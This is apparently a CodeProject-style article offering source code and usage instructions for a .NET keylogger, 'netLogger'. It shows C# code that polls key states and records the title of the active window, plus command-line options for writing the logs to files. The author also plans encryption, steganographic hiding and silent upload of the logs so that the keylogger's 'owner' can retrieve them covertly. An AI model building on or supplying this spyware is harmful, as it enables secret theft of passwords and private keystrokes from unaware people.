.NET Hookless Key-logger (Advanced Keystroke Mining)

• Download source - 12.7 KB

Introduction

Well, if you've found this page, you should already know what a key logger is and does, and how useful it can be. So, I won't bother to explain the logistics. This key logger is based off the example shown here. The original author is Alexander Kent. I would like to give him the credit for publishing a great article.

Background

The reason I created this software is quite simple. I needed a hook-less key logger, and I like to develop in .NET. I also needed something that would work fine in an x64 environment.

Mr. Kent's example was a nice starting point. However, it lacked several features. It actually wasn't too great a key logger at all, due to the fact that it couldn't distinguish between lowercase and upper, among many other key combinations. That's one of the most crucial elements to a key logger: detecting the correct keys and sequence.

However, I do believe the point of his article was to be shown as a proof-of-concept, more so than a well-developed logger.

What's New?

Well, a few things...

• Custom arguments.
• Focused/Active window title logging.
• Accurate character detection.
• Log file formatting << Still needs to be written. Right now, data is just dumped into a string.

Important Information!

When you take a look at the code, you will notice one aspect that stands out! The code is sloppy and uncommented!!! Well, here's the deal. I originally had absolutely no intentions to publish the code, or submit an article to say the least. In all of my software, I comment a ridiculous amount. Kind of ironic that when I actually publish something, it's a mess. Anyway:

The code is quiet sloppy, there is little documentation on what everything is doing, but it is readable! Just take your time, and step-through the code. I added a couple of debugging features commented out.

Please do not take off my head in the replies below. When I clean up the code, and everything is complete, I'll upload the new version.

Using the Software

Using the pre-compiled EXEs is easy:

Usage:
 * You have several args you can pass to customize the
 * program's execution.
 * netLogger.exe -f [filename] -m [mode] -i [interval] -o [output]
 *    -f [filename](Name of the file. ".log" will always be the ext.)
 *    -m ['hour' or 'day'] saves logfile name appended by the hour or day.
 *    -i [interval] in milliseconds, flushes the buffer to either the
 *       console or file. Shorter time = more cpu usage.
 *       10000=10seconds : 60000=1minute : etc...
 *    -o ['file' or 'console'] Outputs all data to either a file or console

Examples:

> netlogger.exe // Default values are used.
> netlogger.exe -f keylog -m day -i 5000 -o file
> netlogger.exe -i 5000 -o console >> c:\keylog.txt

Default Values:
Interval = 120000 // 2 Minutes
Mode = day
Output = file
Filename = netLogger

Using the Code

One of the features of NetLogger is the ability to capture the currently focused window's title and log whatever data is being type under it. For this, we implement GetForegroundWindow() and GetWindowText().

[DllImport("User32.dll")]
    private static extern short GetAsyncKeyState(System.Windows.Forms.Keys
                            vKey); // Keys enumeration

[DllImport("User32.dll")]
    private static extern short GetAsyncKeyState(System.Int32 vKey);
[DllImport("User32.dll")]
    public static extern int GetWindowText(int hwnd, StringBuilder s, 
                        int nMaxCount);
[DllImport("User32.dll")]
    public static extern int GetForegroundWindow(); 

To accurately record the keystrokes, I coded the ability to check if Ctrl, Alt, Capslock, Shift are being held down. If 'Ctrl+a' is pressed, the key logger will output <Ctrl=On>a<Ctrl=Off>.

#region toggles
public static bool ControlKey
{
  get{ return Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000);}
} // ControlKey

public static bool ShiftKey
{
  get { return Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey) & 0x8000); }
} // ShiftKey

public static bool CapsLock
{
  get { return Convert.ToBoolean(GetAsyncKeyState(Keys.CapsLock) & 0x8000); }
} // CapsLock

public static bool AltKey
{
  get { return Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000); }
} // AltKey

#endregion 

if(ControlKey)
{
    if(!tglControl)
    {
        tglControl = true;
        keyBuffer += "<Ctrl=On>";
    }
}
else
{
    if(tglControl)
    {
        tglControl = false;
        keyBuffer += "<Ctrl=Off>";
    }
}

if(AltKey)
{
    if(!tglAlt)
    {
        tglAlt = true;
        keyBuffer += "<Alt=On>";
    }
}
else
{
    if(tglAlt)
    {
        tglAlt = false;
        keyBuffer += "<Alt=Off>";
    }
}

if(CapsLock)
{
    if(!tglCapslock)
    {
        tglCapslock = true;
        keyBuffer += "<CapsLock=On>";
    }
}
else
{
    if(tglCapslock)
    {
        tglCapslock = false;
        keyBuffer += "<CapsLock=Off>";
    }
}

Future Implementations

This was meant to be a very basic key logger. I did not want to code a Kernel-mode or User-mode logger. Maybe some other time. Those who criticize the use of GetAsyncKeyState(), it's simple, just don't use my program. But I do have several plans for this.

1. Log file formatting - Make it nice and easy to read.
2. Encrypt the log files automatically using a public key, specified through arguments or an INI config file.
3. Use Steganography to hide the encrypted log file info a picture specified through arguments.
4. Upload the file to a server/BBS/forum/file host.
5. Delete log file.

This way, the owner of the key logger can easily retrieve the picture, grab the hidden text, decrypt it with their private key, and voila!

History

v1.0.0: Source released.

Updates

5/22/2007 - 7:58pm! Important!

Sorry guys, but I uploaded a bad version. The default output setting was set to "console" instead of "file." I re-uploaded the Zip. Please download again.

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)